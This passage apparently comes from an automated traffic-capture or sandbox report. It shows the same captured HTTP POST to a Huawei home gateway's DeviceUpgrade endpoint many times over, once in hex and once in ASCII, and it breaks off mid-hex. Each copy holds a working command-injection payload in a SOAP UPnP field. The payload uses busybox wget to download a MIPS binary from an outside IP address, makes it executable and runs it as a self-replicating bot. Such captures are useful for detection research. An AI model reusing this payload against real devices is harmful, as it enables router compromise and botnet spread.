6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 